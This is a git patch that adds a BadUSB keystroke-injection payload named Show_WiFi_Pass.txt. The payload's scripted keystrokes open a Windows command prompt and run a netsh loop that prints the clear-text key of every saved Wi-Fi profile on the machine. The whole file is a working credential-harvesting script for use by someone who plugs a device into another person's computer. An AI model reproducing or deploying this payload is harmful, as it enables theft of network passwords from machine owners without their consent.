From 5e51f71cc67c342f309b6255aea10e2cd374d244 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Sun, 10 Jul 2022 00:28:53 -0700 Subject: [PATCH] Add files via upload --- BadUSB/Show_WiFi_Pass.txt | 14 ++++++++++++++ 1 file changed, 14 insertions(+) create mode 100644 BadUSB/Show_WiFi_Pass.txt diff --git a/BadUSB/Show_WiFi_Pass.txt b/BadUSB/Show_WiFi_Pass.txt new file mode 100644 index 000000000..c34b6fba5 --- /dev/null +++ b/BadUSB/Show_WiFi_Pass.txt @@ -0,0 +1,14 @@ +DELAY 2000 +GUI r +DELAY 1000 +STRING cmd +DELAY 500 +ENTER +DELAY 2000 +STRING cls +DELAY 250 +ENTER +DELAY 250 +STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content" +DELAY 250 +ENTER \ No newline at end of file